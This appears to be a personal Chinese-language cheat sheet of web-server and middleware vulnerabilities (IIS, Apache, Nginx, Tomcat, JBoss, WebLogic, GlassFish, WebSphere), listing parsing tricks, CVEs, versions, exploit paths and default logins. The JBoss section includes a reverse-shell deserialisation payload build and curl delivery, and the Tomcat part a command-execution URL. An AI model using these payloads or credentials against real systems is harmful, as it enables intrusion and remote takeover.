之前看吐司别人发的个文档,简单记的笔记
IIS
解析漏洞
IIS 6
*.asp;.jpg 会被当作 asp 解析
*.asp / 目录下的文件会被当作 asp 解析
asa cdx cer 后缀也会被当作 asp 解析
IIS 7
在 Fast-CGI 时, test.jpg 在 url 后加 /.php 即可解析成 php 文件
PUT 任意文件写入
开启了 WebDAV 并允许写入
IIS 短文件漏洞
CVE-2017-7269
2003 r2 IIS 6 开启 WebDAV
Apache
解析漏洞
未知扩展名解析漏洞
1.php.xxx
AddHandler 导致的解析漏洞
如果有 “AddHandler application/x-httpd-php .php”, 只要有. php 后缀即可 a.php.jpg
HTTPD 换行解析漏洞 CVE-2017-15715
影响 2.4.0-2.4.29
上传时文件名为 phpinfo.php 换行符, 访问 / phpinfo.php%0a
Nginx
Nginx 配置文件错误导致的解析漏洞
info.jpg/1.php
Nginx 空字节任意代码执行漏洞 0.5 0.6 0.7-0.7.65 0.8-0.8.37
webshell 名为 a.jpg 访问 a.jpg 空字节. php
Nginx 文件名逻辑漏洞 0.8.41-1.4.3 1.5.0-1.5.7
上传时为 a.jpg 空格, 访问 a.jpg 空格空字节. php
Nginx 配置错误导致的安全问题
目录穿越
在配置别名时, 忘记加 / 访问 / files../
location /files {
autoindex on;
alias c:/WWW/home/;
}
目录遍历 autoindex 为 on
Tomcat
任意文件写入 CVE-2017-12615
conf/web.xml 配置了 readonly=false, 可以往服务器 PUT 文件
Tomcat 远程代码执行 CVE-2019-0232
9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93
随意上传 lxhsec.bat
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
Tomcat + 弱口令 && 后台 getshell 漏洞
Tomcat manager App 暴力破解
JBoss 默认端口 8080 9990
JBoss 5/6 反序列化漏洞 CVE-2017-12149
访问 / invoker/readonly 返回 500 说明存在页面
利用工具: JavaDeserH2HC, 我们选择一个 Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:
生成 ReverseShellCommonsCollectionsHashMap.class
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
生成 ReverseShellCommonsCollectionsHashMap.ser
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip 是 nc 所在的 ip)
利用:
curl http://192.168.31.205:8080/invoker/readonly —data-binary @ReverseShellCommonsCollectionsHashMap.ser
JBoss JMXInvokerServlet 反序列化漏洞
/invoker/JMXInvokerServlet
JBoss EJBInvokerServlet 反序列化漏洞
/invoker/EJBInvokerServlet
JBoss <=4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
/jbossmq-httpil/HTTPServerILServlet
Administration Console 弱口令
/admin-console/
JMX Console 未授权访问
/jmx-console/
WebLogic 默认端口 7001
XMLDecoder 反序列化漏洞 CVE-2017-10271 & CVE-2017-3506
/wls-wsat/
wls9_async_response,wls-wsat 反序列化漏洞 CVE-2019-2725
/_async/
/wls-wsat/
WLS Core Components 反序列化漏洞 CVE-2018-2628
通过 t3 协议触发
WebLogic 任意文件上传漏洞 CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3
/ws_utc/config.do
Weblogic SSRF 漏洞 CVE-2014-4210 10.0.2.0, 10.3.6.0
/uddiexplorer/SearchPublicRegistries.jsp
Weblogic 弱口令后台 getshell
/console
GlassFish 默认端口: 8080(Web 应用端口,即网站内容),4848(GlassFish 管理中心)
GlassFish Directory Traversal(CVE-2017-1000028)
%c0%af 作为 / 直接访问 / META-INF 下的敏感文件
GlassFish 后台 Getshell
WebSphere
Java 反序列化 (CVE-2015-7450)
访问 8880 端口
弱口令后台 getshell
6/7 版本, 后台只需输入 admin, 无需密码即可登录 websphere/ websphere system/ manager
https://www.cnblogs.com/junmoxiao/p/11774772.html